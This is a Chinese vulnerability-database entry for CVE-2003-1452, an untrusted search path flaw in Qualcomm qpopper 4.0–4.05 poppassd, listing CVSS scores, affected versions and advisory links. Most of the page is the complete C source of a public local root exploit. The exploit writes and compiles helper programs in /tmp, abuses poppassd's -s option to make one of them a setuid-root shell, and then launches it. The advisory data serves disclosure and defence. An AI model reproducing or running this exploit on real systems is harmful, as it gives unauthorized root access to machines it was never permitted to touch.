CVE-2003-1452
CVSS3.6
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:58
NMCOE    

[原文]Untrusted search path vulnerability in Qualcomm qpopper 4.0 through 4.05 allows local users to execute arbitrary code by modifying the PATH environment variable to reference a malicious smbpasswd program.


[CNNVD]Qualcomm Qpopper Poppassd本地任意命令执行漏洞(CNNVD-200312-445)

        Qualcomm qpopper 4.0至4.05版本存在不可信搜索路径漏洞。本地用户可以通过修改PATH环境变量引用恶意smbpasswd程序执行任意代码。

- CVSS (基础分值)

CVSS分值: 3.6 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-16 [配置]

- CPE (受影响的平台与产品)

cpe:/a:qualcomm:qpopper:4.0_b14
cpe:/a:qualcomm:qpopper:4.0.1
cpe:/a:qualcomm:qpopper:4.0.5
cpe:/a:qualcomm:qpopper:4.0.4
cpe:/a:qualcomm:qpopper:4.0.3
cpe:/a:qualcomm:qpopper:4.0
cpe:/a:qualcomm:qpopper:4.0.5_fc2
cpe:/a:qualcomm:qpopper:4.0.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1452
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1452
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-445
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11877
(UNKNOWN)  XF  qpopper-poppassd-root-access(11877)
http://www.securityfocus.com/bid/7447
(UNKNOWN)  BID  7447
http://www.securityfocus.com/archive/1/319811
(UNKNOWN)  BUGTRAQ  20030428 Qpopper v4.0.x poppassd local root exploit
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0047.html
(UNKNOWN)  VULNWATCH  20030429 [INetCop Security Advisory] Qpopper v4.0.x poppassd local root
http://securityreason.com/securityalert/3268
(UNKNOWN)  SREASON  3268

- 漏洞信息

Qualcomm Qpopper Poppassd本地任意命令执行漏洞
低危 设计错误
2003-12-31 00:00:00 2003-12-31 00:00:00
本地  
        Qualcomm qpopper 4.0至4.05版本存在不可信搜索路径漏洞。本地用户可以通过修改PATH环境变量引用恶意smbpasswd程序执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21)

Qpopper 4.0.x poppassd Local Root Exploit (EDBID:21)
linux local
2003-04-29 Verified
0 Xpl017Elz
N/A [点击下载]
/*
**
**  Title: Qpopper v4.0.x poppassd local root exploit.
**  Exploit code: 0x82-Local.Qp0ppa55d.c
**
** --
**  ./0x82-Local.Qp0ppa55d -u x82 -p mypasswd
**
**  Qpopper v4.0.x poppassd local root exploit.
**                          by Xpl017Elz
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

#define BUF_SZ 0x82
#define D_POPPASS "/usr/local/bin/poppassd"
#define D_NAME "Happy-Exploit"
#define D_SHELL "/tmp/x82"
#define D_EXEC "/tmp/x0x"

int m_sh();
void banrl();
void usage(char *p_name);
struct stat ss;

void usage(char *p_name)
{
	fprintf(stdout," Usage: %s -option [argument]\n",p_name);
	fprintf(stdout,"\n\t-u - Qpopper username.\n");
	fprintf(stdout,"\t-p - Qpopper password.\n");
	fprintf(stdout,"\t-t - Qpopper poppassd path.\n");
	fprintf(stdout,"\t-h - Help information.\n\n");
	fprintf(stdout," Example> %s -u x82 -p %s\n\n",p_name,D_NAME);
	exit(-1);
}

int m_sh()
{
	char d_shell[BUF_SZ]=D_SHELL;
	char sh_drop[BUF_SZ];
	FILE *fp;
	
	memset((char *)sh_drop,0,sizeof(sh_drop));
	snprintf(sh_drop,sizeof(sh_drop)-1,"%s.c",d_shell);
	
	if((fp=fopen(sh_drop,"w"))==NULL)
	{
		perror(" [-] fopen() error");
		exit(-1);
	}
	
	fprintf(fp,"main() {\n");
	fprintf(fp,"setreuid(0,0);\nsetregid(0,0);\n");
	fprintf(fp,"setuid(0);\nsetgid(0);\n");
	fprintf(fp,"system(\"su -\");\n}\n");
	
	fclose(fp);

	memset((char *)sh_drop,0,sizeof(sh_drop));
	snprintf(sh_drop,sizeof(sh_drop)-1,
		"gcc -o %s %s.c >/dev/null 2>&1;"
		"rm -f %s.c >/dev/null 2>&1",
		d_shell,d_shell,d_shell);
	system(sh_drop);
	
	memset((char *)d_shell,0,sizeof(d_shell));
	strncpy(d_shell,D_EXEC,sizeof(d_shell)-1);
	
	memset((char *)sh_drop,0,sizeof(sh_drop));
	snprintf(sh_drop,sizeof(sh_drop)-1,"%s.c",d_shell);
	
	if((fp=fopen(sh_drop,"w"))==NULL)
	{
		perror(" [-] fopen() error");
		exit(-1);
	}
	
	fprintf(fp,"main() {\n");
	fprintf(fp,"setreuid(0,0);\nsetregid(0,0);\n");
	fprintf(fp,"setuid(0);\nsetgid(0);\n");
	fprintf(fp,"system(\"chown root: %s\");\n",D_SHELL);
	fprintf(fp,"system(\"chmod 6755 %s\");\n}\n",D_SHELL);
	
	fclose(fp);

	memset((char *)sh_drop,0,sizeof(sh_drop));
	snprintf(sh_drop,sizeof(sh_drop)-1,
		"gcc -o %s %s.c >/dev/null 2>&1;"
		"rm -f %s.c >/dev/null 2>&1",
		d_shell,d_shell,d_shell);
	system(sh_drop);

	if((stat(D_SHELL,&ss)==0)&&(stat(D_EXEC,&ss)==0))
	{
		fprintf(stdout," [+] make code.\n");
		return(0);
	}
	else
	{
		fprintf(stderr," [-] code not found.\n");
		return(-1);
	}
}

int main(int argc, char *argv[])
{
	int whtl;
	char user_id[BUF_SZ]=D_NAME;
	char passwd[BUF_SZ]=D_NAME;
	char tg_path[BUF_SZ]=D_POPPASS;
	char df_sh[BUF_SZ]=D_SHELL;

	(void)banrl();
	
	while((whtl=getopt(argc,argv,"U:u:P:p:T:t:Hh"))!=-1)
	{
		extern char *optarg;
		switch(whtl)
		{
			case 'U':
			case 'u':
				memset((char *)user_id,0,sizeof(user_id));
				strncpy(user_id,optarg,sizeof(user_id)-1);
				break;
				
			case 'P':
			case 'p':
				memset((char *)passwd,0,sizeof(passwd));
				strncpy(passwd,optarg,sizeof(passwd)-1);
				break;
				
			case 'T':
			case 't':
				memset((char *)tg_path,0,sizeof(tg_path));
				strncpy(tg_path,optarg,sizeof(tg_path)-1);
				break;
				
			case 'H':
			case 'h':
				(void)usage(argv[0]);
				break;
				
			case '?':
				fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
				exit(-1);
				break;
		}
	}
	
	if(!strcmp(user_id,D_NAME)||!strcmp(passwd,D_NAME))
	{
		(void)usage(argv[0]);
		exit(-1);
	}
	else
	{
		char comm[1024];
		int out[2],in[2];

		if(((int)m_sh())==-1)
		{
			fprintf(stdout," [-] exploit failed.\n\n");
			exit(-1);
		}

		if(pipe(out)==-1)
		{
			perror(" [-] pipe() error");
			exit(-1);
		}
		
		if(pipe(in)==-1)
		{
			perror(" [-] pipe() error");
			exit(-1);
		}
		
		switch(fork())
		{
			case -1:
				perror(" [-] fork() error");
				break;

			case 0:
				close(out[0]);
				close(in[1]);
				
				dup2(out[1],STDOUT_FILENO);
				dup2(in[0],STDIN_FILENO);
				
				execl(tg_path,tg_path,"-s",D_EXEC,0);
				break;

			default:
				close(out[1]);
				close(in[0]);

				fprintf(stdout," [+] execute poppassd.\n");
				memset((char *)comm,0,sizeof(comm));
				read(out[0],comm,sizeof(comm)-1);
				fprintf(stdout," %s",comm);

				memset((char *)comm,0,sizeof(comm));
				snprintf(comm,sizeof(comm)-1,"user %s\r\n",user_id);
				fprintf(stdout," [+] input username.\n");
				write(in[1],comm,strlen(comm));

				memset((char *)comm,0,sizeof(comm));
				read(out[0],comm,sizeof(comm)-1);
				fprintf(stdout," %s",comm);

				memset((char *)comm,0,sizeof(comm));
				snprintf(comm,sizeof(comm)-1,"pass %s\r\n",passwd);
				fprintf(stdout," [+] input password.\n");
				write(in[1],comm,strlen(comm));

				memset((char *)comm,0,sizeof(comm));
				read(out[0],comm,sizeof(comm)-1);
				fprintf(stdout," %s",comm);

				memset((char *)comm,0,sizeof(comm));
				snprintf(comm,sizeof(comm)-1,"newpass %s\r\n",passwd);
				fprintf(stdout," [+] input fake new password.\n");
				write(in[1],comm,strlen(comm));

				close(out[0]);
				close(in[1]);
				break;
		}

		fprintf(stdout," [+] wait, 2sec.\n");
		sleep(2);

		if((stat(D_SHELL,&ss)==0)&&(ss.st_mode&S_ISUID))
		{
			fprintf(stdout," [+] Ok, exploited successfully.\n");
			fprintf(stdout," [*] It's Rootshell !\n\n");
			unlink(D_EXEC);
			execl(D_SHELL,D_SHELL,0);
		}
		else
		{
			fprintf(stdout," [-] exploit failed.\n\n");
			exit(-1);
		}
	}
}

void banrl()
{
	fprintf(stdout,"\n Qpopper v4.0.x poppassd local root exploit.\n");
	fprintf(stdout,"                                by Xpl017Elz\n\n");
}



// milw0rm.com [2003-04-29]
		

- 漏洞信息

60330
Qpopper PATH Variable Search Path Subversion Arbitrary Code Execution
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-04-28 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站